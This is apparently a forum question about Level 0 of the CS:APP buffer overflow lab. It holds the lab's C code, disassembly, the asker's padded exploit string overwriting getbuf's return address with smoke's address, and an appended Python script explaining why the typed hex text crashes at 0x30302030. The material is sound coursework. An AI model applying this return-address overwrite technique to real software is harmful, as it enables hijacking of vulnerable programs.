CS:APP buffer overflow attack

Level 0: Candle (10 pts)
The function getbuf is called within BUFBOMB by a function test having the following C code:
 1 void test()
 2 {
 3     int val;
 4     volatile int local = 0xdeadbeef;
 5     entry_check(3); /* Make sure entered this function properly */
 6     val = getbuf();
 7     /* Check for corrupted stack */
 8     if (local != 0xdeadbeef) {
 9         printf("Sabotaged!: the stack has been corrupted\n");
10     }
11     else if (val == cookie) {
12         printf("Boom!: getbuf returned 0x%x\n", val);
13         validate(3);
14     }
15     else {
16         printf("Dud: getbuf returned 0x%x\n", val);
17     }
18 }
When getbuf executes its return statement (line 5 of getbuf), the program ordinarily resumes execution within function test (at line 8 of this function). Within the file bufbomb, there is a function smoke having the following C code:
void smoke()
{
    entry_check(0); /* Make sure entered this function properly */
    printf("Smoke!: You called smoke()\n");
    validate(0);
    exit(0);
}
Your task is to get BUFBOMB to execute the code for smoke when getbuf executes its return statement, rather than returning to test. You can do this by supplying an exploit string that overwrites the stored return pointer in the stack frame for getbuf with the address of the first instruction in smoke. Note that your exploit string may also corrupt other parts of the stack state, but this will not cause a problem, since smoke causes the program to exit directly.

Some Advice:
All the information you need to devise your exploit string for this level can be determined by examining a disassembled version of BUFBOMB.
Be careful about byte ordering.
You might want to use GDB to step the program through the last few instructions of getbuf to make sure it is doing the right thing.
The placement of buf within the stack frame for getbuf depends on which version of GCC was used to compile bufbomb. You will need to pad the beginning of your exploit string with the proper number of bytes to overwrite the return pointer. The values of these bytes can be arbitrary.
As it says: "Your task is to get BUFBOMB to execute the code for smoke when getbuf executes its return statement, rather than returning to test."
So the task is to change the return address of getbuf to the address of smoke.
Disassembly of getbuf:
0x08048ad0 <+0>: push %ebp
0x08048ad1 <+1>: mov %esp,%ebp
0x08048ad3 <+3>: sub $0x28,%esp
0x08048ad6 <+6>: lea -0x18(%ebp),%eax
0x08048ad9 <+9>: mov %eax,(%esp)
0x08048adc <+12>: call 0x80489c0
0x08048ae1 <+17>: leave
0x08048ae2 <+18>: mov $0x1,%eax
0x08048ae7 <+23>: ret

You can see that buf sits 4+0x18=0x1c bytes below the return address, which is 28 in decimal, so the input has to be padded with 28 bytes, followed by the address of smoke.
Disassembly of smoke:
Dump of assembler code for function smoke:
0x08048eb0 <+0>: push %ebp
0x08048eb1 <+1>: mov %esp,%ebp
0x08048eb3 <+3>: sub $0x8,%esp
0x08048eb6 <+6>: movl $0x80495f7,(%esp)
0x08048ebd <+13>: call 0x8048758 puts@plt
0x08048ec2 <+18>: movl $0x0,(%esp)
0x08048ec9 <+25>: call 0x8048af0
0x08048ece <+30>: movl $0x0,(%esp)
0x08048ed5 <+37>: call 0x80487e8 exit@plt
The address of smoke is 08048eb0, and since this is a little-endian machine
I entered:
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 b0 8e 04 08
But no matter what I try it doesn't work; the output is:
run -t wu<text.txt
Starting program: /home/zawdcxs/Desktop/bufbomb -t wu<text.txt
Team: wu
Cookie: 0x706f2ba4

Program received signal SIGSEGV, Segmentation fault.
0x30302030 in ?? ()
I also tried entering 12 characters, just past the end of buf, and it gives the same message as above. In theory, padding with 28 characters first should be fine.
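As an added example (my own script, not part of the original question or of the lab's own code), the following Python snippet checks what the reported crash address means by using only two facts from the post: the padding of 28 bytes and the exploit string exactly as it was typed. It encodes the smoke address the way a little-endian x86 stores it, reads the four bytes that the typed text places in the saved-return-address slot, and compares them with the faulting EIP. The helper names and the `looks_like_text` heuristic are mine; the input text is constructed from the two lines in the post.

```python
import struct

# Values quoted from the post: the faulting EIP GDB reported and the target address.
FAULT_EIP = 0x30302030
SMOKE_ADDR = 0x08048eb0
PAD = 28  # distance from buf to the saved return address, as computed in the post

# Constructed input: the exploit string exactly as the two lines in the post read,
# i.e. hexadecimal digits stored as text characters, not as raw bytes.
TYPED_INPUT = (
    b"00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\n"
    b"00 00 00 00 00 00 00 00 00 00 00 00 00 b0 8e 04 08"
)


def encode_le32(addr: int) -> bytes:
    """The four raw bytes a little-endian x86 stores for this 32-bit address."""
    return struct.pack("<I", addr)


def return_slot_bytes(data: bytes, pad: int = PAD) -> bytes:
    """The four bytes that land in the saved-return-address slot when `data`
    is copied into buf: whatever follows the `pad` padding bytes."""
    return data[pad:pad + 4]


def return_slot_value(data: bytes, pad: int = PAD) -> int:
    """The same slot read back the way the CPU reads it: little-endian 32-bit."""
    return struct.unpack("<I", return_slot_bytes(data, pad))[0]


def looks_like_text(chunk: bytes) -> bool:
    """True if every byte is printable ASCII, a sign that the file holds hex
    text rather than the raw bytes the hex digits denote (heuristic, my own)."""
    return len(chunk) == 4 and all(0x20 <= b < 0x7F for b in chunk)


def diagnose(data: bytes, fault_eip: int, pad: int = PAD) -> str:
    """Explain a crash address by comparing it with the slot contents of the input."""
    slot = return_slot_bytes(data, pad)
    if return_slot_value(data, pad) == fault_eip and looks_like_text(slot):
        return (f"EIP 0x{fault_eip:08x} is the text {slot!r} at offset {pad}: "
                f"the file contains hex digits as characters, not raw bytes")
    return f"EIP 0x{fault_eip:08x} does not come from offset {pad} of this input"


if __name__ == "__main__":
    print("smoke address as raw little-endian bytes:", encode_le32(SMOKE_ADDR).hex(" "))
    print("bytes at the return slot of the typed input:", return_slot_bytes(TYPED_INPUT))
    print(diagnose(TYPED_INPUT, FAULT_EIP))
```

Running it shows that offset 28 of the typed text holds the characters `0 00`, which read as a little-endian integer are exactly 0x30302030, the address GDB reported. The return slot should instead receive the four raw bytes `b0 8e 04 08`; the lab distribution's hex2raw tool exists precisely to turn a file of hex digits into those raw bytes before it is fed to bufbomb.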

1 answer

qq_15514565
zawdcxsa If I could understand what the problem was by reading the blog, I wouldn't have come here to ask...
more than 3 years ago Reply
qq_15514565
zawdcxsa The images are all broken
more than 3 years ago Reply